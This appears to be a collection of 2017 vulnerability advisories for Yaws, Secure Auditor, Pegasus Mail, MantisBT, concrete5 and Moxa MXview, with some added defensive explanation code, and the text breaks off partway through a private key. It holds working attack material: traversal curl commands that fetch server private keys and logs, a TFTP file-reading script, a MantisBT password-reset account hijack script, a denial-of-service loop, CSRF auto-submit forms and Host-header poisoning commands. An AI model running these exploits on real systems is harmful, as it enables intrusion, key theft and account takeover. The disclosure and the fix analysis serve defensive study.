CVE-2017-10974 Yaws Web Server v1.91 Unauthenticated Remote File Disclosure
[+] Credits: John Page aka hyp3rlinx
[+] Website: hyp3rlinx.altervista.org
[+] Source: http://hyp3rlinx.altervista.org/advisories/YAWS-WEB-SERVER-v1.91-UNAUTHENTICATED-REMOTE-FILE-DISCLOSURE.txt
[+] ISR: ApparitionSec

Vendor:
==================
yaws.hyber.org

Product:
==================
Yaws v1.91 (Yet Another Web Server)

Yaws is a high-performance HTTP/1.1 web server particularly well suited for dynamic-content web applications. Two separate modes of operation are supported:

Standalone mode, where Yaws runs as a regular web server daemon. This is the default mode.
Embedded mode, where Yaws runs as an embedded web server inside another Erlang application.

Vulnerability Type:
==================
Unauthenticated Remote File Disclosure

CVE Reference:
==================
CVE-2017-10974

Security Issue:
==================
Remote attackers who can reach the Yaws web server can read the server's SSL private key file using a directory traversal attack; the access logs and other files outside the document root are disclosed the same way. The traversal sequence is a URL-encoded backslash (%5C, i.e. "\") followed by "../": the backslash variant passes the server's path check, while the 404 page below shows that the server still ends up resolving it as "/../". This version is somewhat old, but it was still available for download at the time of writing: http://yaws.hyber.org/download/

Exploit/POC:
==================
Steal the Yaws server SSL private key ".pem" file:

curl http://REMOTE-VICTIM-IP:8080/%5C../ssl/yaws-key.pem

-----BEGIN RSA PRIVATE KEY-----
MIICWwIAAAKBgQDMJHAcJXB9TzkYg/ghXNjOAp3zcgKC4XZo4991SPGYukKVU1Fv
RX0YgPx3wz8Ae7ykPg0KW7O3D9Pn8liazTYEaXskNKAzOFr1gtBd7p937PKNQk++
3/As5EfJjz+lBrwUGbSicJgldJk3Cj89htMUqGwL2Bl/yOQIsZtyLlrP1wIDAQAB
AoGAYgEwTWLwAUjSaWGs8zJm52g8Ok7Gw+CfNzYG5oCxdBgftR693sSmjOgHzNtQ
WMQOyW7eDBYATmdr3VPsk8znHBSfQ19gAJjR89lJ6lt5qDMNtXMUWILn91g+RbkO
gmTkhD8uc0e/3FJBwPxFJWQzFEcAR4jNFJwhNzg6CO8CK/ECQQD7sNzvMRnUi1RQ
tiKgRxdjdEwNh52OUPwuJWhKdBLIpHBAJxCBHJB+1N0ufpqaEgUfJ5+gEYrBRMJh
aTCIJul5AkEAz6MsmkMz6Iej5zlKrlDL5q6GU+wElXK/F1H8tN/JchoSXN8BRCJZ
DLpK0mcMN4yukHKDCo0LD9NBlRQFDll/zwJASb2CrW2kVLpRhKgoMu9BMflDwv8G
IcqmZ9q72HxzeGd9H76SPlGhIBe7icC8CQHYkE0qnlolXgSIMsP/3RQReQJAYHnt
+INvNAUKSB6br6EFDNtcuNO6UYJufbRvmc89d5HbpGFN4k2fWMWajGarC4iHd8Bt
WNKuKB09pLoXm1JEiwJAfRtIXE6sr4MQOL6aWwGElw+Yb4B1WBhBiPRRwGTX0nzN
HXF3851+kgZBZjjzA3Ib2nr5PeXkZBBLE/4jJvRPRA==
-----END RSA PRIVATE KEY-----

OR read the access logs:

curl http://REMOTE-VICTIM-IP:8080/%5C../logs/localhost.8080.access

404 Not Found
Not Found
The requested URL /../logs/localhost.8080.access was not found on this server.
Yaws 1.91 Server at localhost:8080
[root@localhost ~]#

Then:

curl http://REMOTE-VICTIM-IP:8080/%5C../logs/localhost.8080.access

127.0.0.1 - - [26/Jun/2017:09:52:27 -0400] "GET / HTTP/1.1" 200 74419 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:54.0) Gecko/20100101 Firefox/54.0"
127.0.0.1 - - [26/Jun/2017:09:52:27 -0400] "GET /stil.css HTTP/1.1" 200 1677 "http://127.0.0.1:8080/" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:54.0) Gecko/20100101 Firefox/54.0"
127.0.0.1 - - [26/Jun/2017:09:52:27 -0400] "GET /icons/yaws_head.gif HTTP/1.1" 200 2308 "http://127.0.0.1:8080/" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:54.0) Gecko/20100101 Firefox/54.0"
127.0.0.1 - - [26/Jun/2017:09:52:27 -0400] "GET /icons/yaws_pb.gif HTTP/1.1" 200 1444 "http://127.0.0.1:8080/" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:54.0) Gecko/20100101 Firefox/54.0"
127.0.0.1 - - [26/Jun/2017:09:52:27 -0400] "GET /icons/yaws_y.gif HTTP/1.1" 200 4831 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:54.0) Gecko/20100101 Firefox/54.0"
127.0.0.1 - - [26/Jun/2017:09:52:33 -0400] "GET /bindings.yaws HTTP/1.1" 200 5502 "http://127.0.0.1:8080/" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:54.0) Gecko/20100101 Firefox/54.0"
127.0.0.1 - - [26/Jun/2017:09:52:42 -0400] "GET /configuration.yaws HTTP/1.1" 200 8634 "http://127.0.0.1:8080/bindings.yaws" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:54.0) Gecko/20100101 Firefox/54.0"
etc...

Network Access:
==================
Remote

Severity:
==================
High

Disclosure Timeline:
==================
Vendor Notification: June 26, 2017
No replies
July 7, 2017 : Public Disclosure

[+] Disclaimer
The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author.
The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere.

All content (c). hyp3rlinx
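The %5C trick above is the general failure of checking a request path before it has been fully decoded and normalised. The Python below is an added illustration, not Yaws code (Yaws is written in Erlang and its actual path check is not shown in this advisory): a check-then-normalise resolver that blocks a plain ../ but lets the backslash form through, beside a resolver that maps both separators first and only then confines the result to the document root. The docroot path and the position of ssl/ and logs/ one level above it are assumptions made for the example.

```python
import posixpath
from typing import Optional
from urllib.parse import unquote

# Assumed layout: the advisory only shows that ../ssl/ and ../logs/ sit one level
# above the document root; the directory names here are illustrative.
DOCROOT = "/var/www/yaws/www"


def naive_resolve(docroot: str, request_path: str) -> Optional[str]:
    """Check-then-normalise, the ordering that makes the %5C trick work.

    Step 1 rejects any ".." segment of the decoded path, which stops a plain
    "/../ssl/yaws-key.pem".  Step 2, done by a later layer, also treats "\\" as
    a separator, so "\\.." (which step 1 saw as an ordinary file name) becomes
    "/.." after the check has already passed.
    """
    decoded = unquote(request_path.split("?", 1)[0])
    if ".." in decoded.split("/"):
        return None
    later = decoded.replace("\\", "/")          # too late: the check is done
    return posixpath.normpath(posixpath.join(docroot, later.lstrip("/")))


def safe_resolve(docroot: str, request_path: str) -> Optional[str]:
    """Decode and normalise first, then confine the result to the docroot."""
    path = unquote(request_path.split("?", 1)[0])
    if "\x00" in path:                           # NUL would truncate C file APIs
        return None
    path = path.replace("\\", "/")               # both separators, BEFORE checking
    full = posixpath.normpath(posixpath.join(docroot, path.lstrip("/")))
    root = docroot.rstrip("/")
    if full != root and not full.startswith(root + "/"):
        return None                              # climbed out of the document root
    return full


if __name__ == "__main__":
    for req in ("/index.html", "/../ssl/yaws-key.pem", "/%5C../ssl/yaws-key.pem"):
        print("%-28s naive=%s  safe=%s" % (req, naive_resolve(DOCROOT, req),
                                          safe_resolve(DOCROOT, req)))
```

The order of operations is the whole fix: every transformation the file layer will apply (percent-decoding, separator mapping, dot-segment collapsing) has to happen before the containment check, or the check is evaluating a different string from the one that reaches the filesystem.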
CVE-2017-9024 Secure Auditor - v3.0 Directory Traversal
[+] Credits: John Page aka HYP3RLINX
[+] Website: hyp3rlinx.altervista.org
[+] Source: http://hyp3rlinx.altervista.org/advisories/SECURE-AUDITOR-v3.0-DIRECTORY-TRAVERSAL.txt
[+] ISR: ApparitionSec

Vendor:
==================
www.secure-bytes.com

Product:
==================
Secure Auditor - v3.0

Secure Auditor suite is a unified digital risk management solution for conducting automated audits on Windows, Oracle and SQL databases and Cisco devices.

Vulnerability Type:
==================
Directory Traversal

CVE Reference:
==================
CVE-2017-9024

Security Issue:
==================
Secure Bytes Cisco Configuration Manager, as bundled in Secure Bytes Secure Cisco Auditor (SCA) 3.0, has a Directory Traversal issue in its TFTP Server, allowing attackers to read arbitrary files via ../ sequences in a pathname. TFTP carries no authentication, so any client that can reach UDP port 69 can issue the read request.

Exploit/POC:
==================
import sys,socket

print 'Secure Auditor v3.0 / Cisco Config Manager'
print 'TFTP Directory Traversal Exploit'
print 'Read ../../../../Windows/system.ini POC'
print 'hyp3rlinx'

HOST = raw_input("[IP]> ")
FILE = '../../../../Windows/system.ini'
PORT = 69

PAYLOAD = "\x00\x01"          #TFTP Read (RRQ opcode)
PAYLOAD += FILE+"\x00"        #Read system.ini using directory traversal
PAYLOAD += "netascii\x00"     #TFTP transfer mode

s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
s.sendto(PAYLOAD, (HOST, PORT))
out = s.recv(1024)            #first DATA block of the file
s.close()

print "Victim Data located on : %s " %(HOST)
print out.strip()

Network Access:
==================
Remote

Severity:
==================
High

Disclosure Timeline:
==================
Vendor Notification: May 10, 2017
No replies
May 20, 2017 : Public Disclosure
CVE-2017-9046 Pegasus "winpm-32.exe" v4.72 Mailto: Link Remote Code Execution
[+] Credits: John Page AKA hyp3rlinx
[+] Website: hyp3rlinx.altervista.org
[+] Source: http://hyp3rlinx.altervista.org/advisories/PEGASUS-MAILTO-LINK-REMOTE-CODE-EXECUTION.txt
[+] ISR: APPARITIONSEC

Vendor:
==================
www.pmail.com

Product:
==================
Pegasus "winpm-32.exe" v4.72 build 572

Pegasus Mail is a free, standards-based electronic mail client suitable for use by single or multiple users on single computers or on local area networks. A proven product, it has served millions of users since it was released in 1990.

Vulnerability Type:
==================
Remote Code Execution

CVE Reference:
==================
CVE-2017-9046

Security Issue:
==================
Pegasus Mail has a DLL load flaw that allows arbitrary code execution by clicking an HTML "mailto:" link if a DLL named "ssgp.dll" exists on the victim's Desktop. Tested successfully using the Internet Explorer web browser.

e.g.
<a href="mailto:n...@victim.com">Link text</a>

Place "ssgp.dll" on the Desktop, then visit the webpage in Internet Explorer and click the mailto: link: arbitrary code is executed and Pegasus (pmail) is then launched. The user needs to have set up PMAIL with the "mailto:" link option on install.

Exploit:
==================
1) Set Pegasus as the default email client for opening emails, and set up PMAIL with the "mailto:" link option on install.

2) Compile "ssgp.dll" as a DLL using the 'C' code below.

#include <windows.h>

//gcc -c ssgp.c
//gcc -shared -o ssgp.dll ssgp.o

BOOL APIENTRY DllMain(HINSTANCE hInst, DWORD reason, LPVOID reserved){
    switch (reason) {
      case DLL_PROCESS_ATTACH:
        MessageBox(NULL, "Code Execution!", "APPARITIONSEC", MB_OK);
        break;
    }
    return TRUE;   /* keep the DLL loaded; returning FALSE makes the loader unload it again */
}

3) Place "ssgp.dll" on the Desktop.

4) Create an HTML file with the following in the web server root directory:

<a href="mailto:n...@victim.com">Pegasus Exploit POC</a>

5) Open the webpage in the Internet Explorer web browser and click the malicious mailto: link. Our code gets executed...

Network Access:
==================
Remote

Severity:
==================
High

Disclosure Timeline:
==================
Vendor Notification: October 8, 2016
Vendor supposedly fixed: January 21, 2016
May 19, 2017 : Public Disclosure
CVE-2017-7620 Mantis Bug Tracker 1.3.10 / v2.3.0 CSRF Permalink Injection
[+] Credits: John Page a.k.a hyp3rlinx
[+] Website: hyp3rlinx.altervista.org
[+] Source: http://hyp3rlinx.altervista.org/advisories/MANTIS-BUG-TRACKER-CSRF-PERMALINK-INJECTION.txt
[+] ISR: ApparitionSec

Vendor:
==================
www.mantisbt.org

Product:
==================
Mantis Bug Tracker 1.3.10 / v2.3.0

MantisBT is a popular free web-based bug tracking system. It is written in PHP and works with MySQL, MS SQL, and PostgreSQL databases.

Vulnerability Type:
==================
CSRF Permalink Injection

CVE Reference:
==================
CVE-2017-7620

Security Issue:
==================
Remote attackers can inject arbitrary permalinks into the MantisBT web interface if an authenticated user visits a malicious webpage. The vulnerable code in "string_api.php" (under mantis/core/) did not account for supplied backslashes: the check only treats a URL as pointing to another domain when it carries a scheme (something followed by ":"), so a value such as "\/ATTACKER-IP" passes, yet browsers treat the backslash as a slash and resolve it as the protocol-relative "//ATTACKER-IP".

Line: 270
# Check for URL's pointing to other domains
if( 0 == $t_type || empty( $t_matches['script'] ) ||
    3 == $t_type && preg_match( '@(?:[^:]*)?:/*@', $t_url ) > 0 ) {
    return ( $p_return_absolute ? $t_path . '/' : '' ) . 'index.php';
}

# Start extracting regex matches
$t_script = $t_matches['script'];
$t_script_path = $t_matches['path'];

Exploit/POC:
==================
<form action="http://VICTIM-IP/mantisbt-2.3.0/permalink_page.php?url=\/ATTACKER-IP" method="POST">
</form>
<script>document.forms[0].submit()</script>

OR

<form action="http://VICTIM-IP/permalink_page.php?url=\/ATTACKER-IP%2Fmantisbt-2.3.0%2Fsearch.php%3Fproject_id%3D1%26sticky%3Don%26sort%3Dlast_updated%26dir%3DDESC%26hide_status%3D90%26match_type%3D0" method="POST">
</form>
<script>document.forms[0].submit()</script>

Network Access:
==================
Remote

Severity:
==================
Medium

Disclosure Timeline:
==================
Vendor Notification: April 9, 2017
Vendor Release Fix: May 15, 2017
Vendor Disclosed: May 20, 2017
May 20, 2017 : Public Disclosure
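To see why the colon test in the excerpt above is not enough, here is an added Python model (not MantisBT code) of that check beside what a browser does with the injected value: for http(s) URLs the WHATWG URL parser treats a backslash exactly like a slash, so \/ATTACKER-IP is the protocol-relative //ATTACKER-IP. The hardened check normalises the same way the browser will before deciding whether the URL stays on the site. The host names are the placeholders from the PoC and the page URL is assumed.

```python
import re
from urllib.parse import unquote, urljoin, urlsplit

# The regex from the string_api.php excerpt: a URL "points to another domain"
# only if it carries a scheme, i.e. something followed by ':'.
SCHEME_RE = re.compile(r"(?:[^:]*)?:/*")


def weak_is_local(url: str) -> bool:
    """The colon test alone, as in the excerpt: no ':' means 'local'."""
    return SCHEME_RE.search(url) is None


def browser_resolve(page_url: str, href: str) -> str:
    """What a WHATWG-conformant browser makes of the href: for http(s) a '\\'
    is treated like '/', so '\\/host' is the protocol-relative '//host'."""
    return urljoin(page_url, href.strip().replace("\\", "/"))


def permalink_target(page_url: str, raw_url_param: str) -> str:
    """Decode the permalink_page.php?url= value as PHP does, then resolve it as the browser does."""
    return browser_resolve(page_url, unquote(raw_url_param))


def safe_is_local(url: str) -> bool:
    """Normalise the way the browser will, then require no scheme and no host."""
    if any(c in url for c in "\x00\t\r\n"):    # control characters the parser strips
        return False
    u = url.strip().replace("\\", "/")
    parts = urlsplit(u)
    if parts.scheme or parts.netloc:           # 'http:', 'javascript:', '//host', '\\/host'
        return False
    # '///host' is also an authority for http(s): extra slashes are skipped.
    return u.startswith("/") and not u.startswith("//")


if __name__ == "__main__":
    page = "http://VICTIM-IP/mantisbt-2.3.0/permalink_page.php"
    for candidate in ("\\/ATTACKER-IP", "//ATTACKER-IP", "/search.php?project_id=1"):
        print("%-26s weak=%-5s safe=%-5s browser->%s" % (
            candidate, weak_is_local(candidate), safe_is_local(candidate),
            browser_resolve(page, candidate)))
```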
CVE-2017-7615 Mantis Bug Tracker v1.3.0 / 2.3.0 Pre-Auth Remote Password Reset
[+] Credits: John Page a.k.a hyp3rlinx
[+] Website: hyp3rlinx.altervista.org
[+] Source: http://hyp3rlinx.altervista.org/advisories/MANTIS-BUG-TRACKER-PRE-AUTH-REMOTE-PASSWORD-RESET.txt
[+] ISR: ApparitionSec

Vendor:
==================
www.mantisbt.org

Product:
==================
Mantis Bug Tracker v1.3.0 / 2.3.0

MantisBT is a popular free web-based bug tracking system. It is written in PHP and works with MySQL, MS SQL, and PostgreSQL databases.

Vulnerability Type:
==================
Pre-Auth Remote Password Reset

CVE Reference:
==================
CVE-2017-7615

Security Issue:
==================
The Mantis account verification page 'verify.php' allows resetting ANY user's password. Remote unauthenticated attackers can send HTTP GET requests to hijack ANY Mantis account by guessing the user ID / username.

Vulnerable code, verify.php line 66:

if( $f_confirm_hash != $t_token_confirm_hash ) {
    trigger_error( ERROR_LOST_PASSWORD_CONFIRM_HASH_INVALID, ERROR );
}

This code attempts to verify a user account by comparing the supplied confirmation hash with the stored one. However, supplying an empty value passes the check, e.g.

http://127.0.0.1/mantisbt-2.3.0/verify.php?id=1&confirm_hash=

This then allows changing the password and hijacking ANY MantisBT account. All versions >= 1.3.0 as well as 2.3.0 are affected; 1.2.x versions are not affected.

References:
https://mantisbt.org/bugs/view.php?id=22690#c56509

POC Video URL:
==================
https://vimeo.com/213144905

Exploit/POC:
==================
import cookielib,urllib,urllib2,time

print 'Mantis Bug Tracker >= v1.3.0 - 2.3.0'
print '1.2.x versions are not affected'
print 'Remote Password Reset 0day Exploit'
print 'Credits: John Page a.k.a HYP3RLINX / APPARITIONSEC\n'

IP=raw_input("[Mantis Victim IP]>")
realname=raw_input("[Username]")
verify_user_id=raw_input("[User ID]")
passwd=raw_input("[New Password]")

TARGET = 'http://'+IP+'/mantisbt-2.3.0/verify.php?id='+verify_user_id+'&confirm_hash='
values={}
account_update_token=''
#verify_user_id='1'           #Admin = 1
#realname='administrator'     #Must be known or guessed.

#REQUEST 1, get Mantis account_update_token
cookies = cookielib.CookieJar()
opener = urllib2.build_opener(
    urllib2.HTTPRedirectHandler(),
    urllib2.HTTPHandler(debuglevel=0),
    urllib2.HTTPSHandler(debuglevel=0),
    urllib2.HTTPCookieProcessor(cookies))

res = opener.open(TARGET)
arr=res.readlines()

for s in arr:
    if 'account_update_token' in s:
        break

#print s[61:-38]
ACCT_TOKEN=s[61:-38]          #slice the token value out of the hidden input line

time.sleep(0.3)

#REQUEST 2 Hijack the Admin Account
TARGET='http://'+IP+'/mantisbt-2.3.0/account_update.php'

values = {'verify_user_id' : verify_user_id,
          'account_update_token' : ACCT_TOKEN,
          'realname' : realname,
          'password' : passwd,
          'password_confirm' : passwd}

data = urllib.urlencode(values)

opener = urllib2.build_opener(
    urllib2.HTTPRedirectHandler(),
    urllib2.HTTPHandler(debuglevel=0),
    urllib2.HTTPSHandler(debuglevel=0),
    urllib2.HTTPCookieProcessor(cookies))

response = opener.open(TARGET, data)
the_page = response.read()
http_headers = response.info()
#print http_headers
print response.getcode()
print 'Account Hijacked!'
time.sleep(2)

Network Access:
==================
Remote

Severity:
==================
Critical

Disclosure Timeline:
==================
Vendor Notification: April 7, 2017
Vendor acknowledged: April 7, 2017
Vendor patch created: April 10, 2017
Vendor Disclosure: April 16, 2017
April 16, 2017 : Public Disclosure
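Why an empty confirm_hash passes: the excerpt compares with PHP's loose "!=", and the advisory does not show where $t_token_confirm_hash comes from. The added Python below, which is not MantisBT code, assumes the stored value is null when no verification token is on file, and models the slice of PHP's loose-comparison rules that matters (null against a string compares as '', numeric strings compare as numbers). Beside it is the check as it should be written: refuse empty values, then compare strictly and in constant time. The numeric-string case ("0e..." hashes) goes beyond the advisory; it is included because it is the other way a loose hash comparison fails.

```python
import hmac
import re
from typing import Optional

# PHP's notion of a numeric string (surrounding whitespace allowed).
NUMERIC_RE = re.compile(r"^\s*[+-]?(\d+(\.\d*)?|\.\d+)([eE][+-]?\d+)?\s*$")


def php_loose_equal(a: Optional[str], b: Optional[str]) -> bool:
    """Subset of PHP's loose '==' for what a request-parameter check sees.

    null is compared to a string as if it were '' (so '' == null is true), and
    two numeric strings are compared as numbers ('0e123' == '0e999' is true,
    both being 0.0).  Anything else is a byte-for-byte comparison.
    """
    a = "" if a is None else a
    b = "" if b is None else b
    if NUMERIC_RE.match(a) and NUMERIC_RE.match(b):
        return float(a) == float(b)
    return a == b


def vulnerable_verify(confirm_hash: Optional[str], stored_hash: Optional[str]) -> bool:
    """verify.php as excerpted above: the request is rejected only when the
    loose '!=' fires, so it is accepted whenever loose '==' holds."""
    return php_loose_equal(confirm_hash, stored_hash)


def hardened_verify(confirm_hash: Optional[str], stored_hash: Optional[str]) -> bool:
    """Require both values to be present, then compare strictly in constant time."""
    if not confirm_hash or not stored_hash:
        return False
    return hmac.compare_digest(confirm_hash.encode("utf-8"), stored_hash.encode("utf-8"))


if __name__ == "__main__":
    # (supplied confirm_hash, stored token) pairs; None models "no token on file".
    for supplied, stored in (("", None), ("0e1234", "0e9999"), ("abc", "abc"), ("abc", "abd")):
        print("%-8r vs %-8r  vulnerable=%-5s hardened=%s" % (
            supplied, stored, vulnerable_verify(supplied, stored), hardened_verify(supplied, stored)))
```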
concrete5 v8.1.0 Host Header Injection
[+] Credits: John Page a.k.a hyp3rlinx
[+] Website: hyp3rlinx.altervista.org
[+] Source: http://hyp3rlinx.altervista.org/advisories/CONCRETE5-v8.1.0-HOST-HEADER-INJECTION.txt
[+] ISR: ApparitionSec

Vendor:
==================
www.concrete5.org

Product:
==================
concrete5 v8.1.0

concrete5 is an open-source content management system (CMS) for publishing content on the World Wide Web and intranets.

Vulnerability Type:
==================
Host Header Injection

CVE Reference:
==================
CVE-2017-7725

Security Issue:
==================
If a user does not specify a "canonical" URL on installation of concrete5, unauthenticated remote attackers can write to the "CollectionVersionBlocksOutputCache" table of the MySQL database by making an HTTP GET request with a poisoned Host header. Affected concrete5 pages are then rendered from that cache with links pointing at the attacker's host, for every later visitor.

Example MySQL data from the "CollectionVersionBlocksOutputCache" table:

(164, 1, 57, 'Header Site Title', '<a href="http://attacker-ip/concrete5-8.1.0/index.php" id="header-site-title">Elemental</a>', 1649861489

e.g.

c:\> curl -v http://VICTIM-IP/concrete5-8.1.0/index.php/services -H "Host: attacker-ip" | more

Services :: POC
var CCM_DISPATCHER_FILENAME = "/concrete5-8.1.0/index.php";
var CCM_CID = 162;
var CCM_EDIT_MODE = false;
var CCM_ARRANGE_MODE = false;
var CCM_IMAGE_PATH = "/concrete5-8.1.0/concrete/images";
var CCM_TOOLS_PATH = "/concrete5-8.1.0/index.php/tools/required";
var CCM_APPLICATION_URL = "http://attacker-ip/concrete5-8.1.0";      <=== HERE
var CCM_REL = "/concrete5-8.1.0";

Exploit:
==================
curl -v http://VICTIM-IP/concrete5-8.1.0/index.php/team/faq -H "Host: attacker-ip"
curl -v http://VICTIM-IP/concrete5-8.1.0/index.php/services -H "Host: attacker-ip"
curl -v http://VICTIM-IP/concrete5-8.1.0/index.php/portfolio -H "Host: attacker-ip"

Navigate to one of these URLs:

http://VICTIM-IP/concrete5-8.1.0/index.php/services
http://VICTIM-IP/concrete5-8.1.0/index.php/portfolio

Click on the links in the header portion of the webpage from one of the above URLs:

Services
Portfolio
Team / Drop down Menu
Blog
Contact

OR click on the links in the footer portion of the webpage:

FAQ / Help
Case Studies
Blog
Another Link
View on Google Maps

Result: the user gets redirected to attacker-ip.

Network Access:
==================
Remote

Severity:
==================
High

Disclosure Timeline:
==================
Vendor Notification : April 11, 2017
Vendor reply: "this is a known issue" : April 12, 2017
Requested a CVE from mitre. CVE assigned : April 12, 2017
April 13, 2017 : Public Disclosure
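The root cause is building the application's absolute URL from the client-supplied Host header when no canonical URL is configured, and then caching the rendered links for every later visitor. The Python below is an added model of the weak and the corrected behaviour, not concrete5 code: with a canonical URL the header is ignored; without one the host must match an allow-list, otherwise the request is refused and nothing is cached. The install path /concrete5-8.1.0 and the "Elemental" link markup are taken from the advisory's output; the allowed host names are placeholders.

```python
from typing import Mapping, Optional, Sequence, Tuple

APP_PATH = "/concrete5-8.1.0"        # install path seen in the advisory's curl output


def _split_host(host_header: str) -> Tuple[str, Optional[str]]:
    """Lower-case the Host value and separate an explicit port ("[::1]:8080" included)."""
    host = host_header.strip().lower()
    if host.startswith("["):                          # IPv6 literal
        name, _, rest = host.partition("]")
        return name + "]", rest.lstrip(":") or None
    name, sep, port = host.rpartition(":")
    return (name, port) if sep else (host, None)


def weak_base_url(headers: Mapping[str, str], scheme: str = "http") -> str:
    """No canonical URL configured: the application URL is whatever the client sent."""
    name, port = _split_host(headers.get("Host", ""))
    return "%s://%s%s%s" % (scheme, name, ":" + port if port else "", APP_PATH)


def safe_base_url(headers: Mapping[str, str], scheme: str = "http",
                  canonical_url: Optional[str] = None,
                  allowed_hosts: Sequence[str] = ()) -> Optional[str]:
    """Prefer the configured canonical URL; otherwise accept Host only from an
    allow-list.  None means: answer 400 and do not render or cache anything."""
    if canonical_url:
        return canonical_url.rstrip("/")
    name, port = _split_host(headers.get("Host", ""))
    if name not in {h.lower() for h in allowed_hosts}:
        return None
    if port is not None and not port.isdigit():
        return None
    default_port = {"http": "80", "https": "443"}[scheme]
    suffix = "" if port in (None, default_port) else ":" + port
    return "%s://%s%s%s" % (scheme, name, suffix, APP_PATH)


def header_site_title(base_url: str) -> str:
    """The 'Header Site Title' block markup the advisory found in the output cache."""
    return '<a href="%s/index.php" id="header-site-title">Elemental</a>' % base_url


if __name__ == "__main__":
    poisoned = {"Host": "attacker-ip"}                # constructed request header
    print("weak    :", header_site_title(weak_base_url(poisoned)))
    print("allow   :", safe_base_url(poisoned, allowed_hosts=["victim-ip"]))
    print("canonic :", safe_base_url(poisoned, canonical_url="http://victim-ip/concrete5-8.1.0/"))
```

The allow-list check has to run before any caching layer sees the request: a poisoned entry written once is served to every unauthenticated visitor until it expires, which is what makes this a stored rather than a reflected problem.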
CVE-2017-7456 Moxa MXview v2.8 Denial Of Service
[+] Credits: John Page AKA hyp3rlinx
[+] Website: hyp3rlinx.altervista.org
[+] Source: http://hyp3rlinx.altervista.org/advisories/MOXA-MXVIEW-v2.8-DENIAL-OF-SERVICE.txt
[+] ISR: ApparitionSec

Vendor:
==================
www.moxa.com

Product:
==================
MXView v2.8
Download: http://www.moxa.com/product/MXstudio.htm

MXview Industrial Network Management Software.
Auto discovery of network devices and physical connections
Event playback for quick troubleshooting
Color-coded VLAN/IGMP groups and other visualized network data
Supports MXview ToGo mobile app for remote monitoring and notification, anytime, anywhere.

Vulnerability Type:
==================
Denial Of Service

CVE Reference:
==================
CVE-2017-7456

Security Issue:
==================
Remote attackers can DoS the MXview server by sending a large string of junk characters for the user ID and password login credential fields.

Exploit/POC:
==================
import urllib,urllib2

print 'Moxa MXview v2.8 web interface DOS'
print 'hyp3rlinx'

IP=raw_input("[Moxa MXView IP]>")
PAYLOAD="A"*2

url = 'http://'+IP+'/goform/account'
data = urllib.urlencode({'uid' : PAYLOAD, 'pwd' : PAYLOAD, 'action' : 'login'})

while 1:
    req = urllib2.Request(url, data)
    res = urllib2.urlopen(req)
    print res

Network Access:
==================
Remote

Severity:
==================
Medium

Disclosure Timeline:
==================
Vendor Notification: March 5, 2017
Vendor confirms vulnerability : March 21, 2017
Vendor "updated firmware April 7, 2017" : March 29, 2017
April 9, 2017 : Public Disclosure
CVE-2017-7455 Moxa MXview v2.8 Remote Private Key Disclosure
[+] Credits: John Page AKA HYP3RLINX
[+] Website: hyp3rlinx.altervista.org
[+] Source: http://hyp3rlinx.altervista.org/advisories/MOXA-MXVIEW-v2.8-REMOTE-PRIVATE-KEY-DISCLOSURE.txt
[+] ISR: APPARITIONSEC

Vendor:
==================
www.moxa.com

Product:
==================
MXview V2.8
Download: http://www.moxa.com/product/MXstudio.htm

MXview Industrial Network Management Software.
Auto discovery of network devices and physical connections
Event playback for quick troubleshooting
Color-coded VLAN/IGMP groups and other visualized network data
Supports MXview ToGo mobile app for remote monitoring and notification, anytime, anywhere.

Vulnerability Type:
==================
Remote Private Key Disclosure

CVE Reference:
==================
CVE-2017-7455

Security Issue:
==================
MXview stores a copy of its web server's private key under C:\Users\TARGET-USER\AppData\Roaming\moxa\mxview\web\certs\mxview.key, inside the directory the embedded GoAhead web server serves from. Remote attackers can read the "mxview.key" file with a plain unauthenticated HTTP GET request to /certs/mxview.key on port 81.

e.g.

curl -v http://VICTIM-IP:81/certs/mxview.key

* About to connect() to VICTIM-IP port 81
*   Trying VICTIM-IP... connected
* Connected to VICTIM-IP (VICTIM-IP) port 81
> GET /certs/mxview.key HTTP/1.1
> User-Agent: curl/7.15.5 (x86_64-redhat-linux-gnu) libcurl/7.15.5
> Host: VICTIM-IP:81
> Accept: */*
>
< HTTP/1.1 200 OK
< Date: Tue Feb 28 14:18:00 2017
< Server: GoAhead-Webs
< Last-modified: Tue Feb 28 10:46:51 2017
< Content-length: 916
< Content-type: text/plain
-----BEGIN PRIVATE KEY-----
MIICdwIBADANBgkqhkiG2w0BAQEFAASCAmEwggJdAgEAAoGBAMO2BjHS6rFYqxPb
QCjhVn5+UGwfICfETzk5JQvhkhc71bnsDHI7lVyYhheYLcPQBEglVolwGANPp7LF
2lhG+UaSFfTVk8UDvV0qQpjSQvDjcWSuKBfceyT5zmI8ynxuMHoqBR7ZOSLY31z+
Rxt+JCykwqfMGdjawnC5ivr8iWDpAgMBAAECgYAQpHjwYbQtcpHRtXJGR6s4RHuI
RjlQyGPIRPC+iucGbMMm9Ui1qhVwc1Pry7gQj67dh7dNJqgUGAD1tdd0bEykKoqm
ICgXj0HMPCLxUy4CHIZInsBhzAyp/3atkDIaeELZckCbmttkVvncDi+b9HnuL/To
YwJpuLkpXEKpjK7iAQJBAOof+yliPn7UsBecw/Hc/ixeDRGI1kjtvuOvSi6jLZoj
3rzODMSD1eRcrK/GJydWVT8TV3WXXYn3M1cu3kmQJKkCQQDV/zlBtFFPPVAl1zy7
UBG+RPI63uXeaA0C1+RX2XfJSR4zeKxnWgalzUl0UwMgWB3Gpp2+VW5a/zw3aKlK
6MJBAkBHPMXqWKdVZhfSh3Ojky+PhmqJjE5PUG/FzZ9Pw3zrqsBqSHPgE5Ewc/Zj
YXKmavCbSaJR+GWQxjPL8knWrlJJAkEAkahnEJHrxkO1igw3Ckg0y4yiU+/kBr5M
HONWSXV8U0WxiNdagf6FB9XzaXoXZuyTl+NQ+3yq4MVZ910F3jcQAQJBAI+q0AcX
EskHai2Fx24gkHwwRxacsiXrRClxIj5NB52CSo2Sy6EF02DKQVWR3oIjDesXcWvl
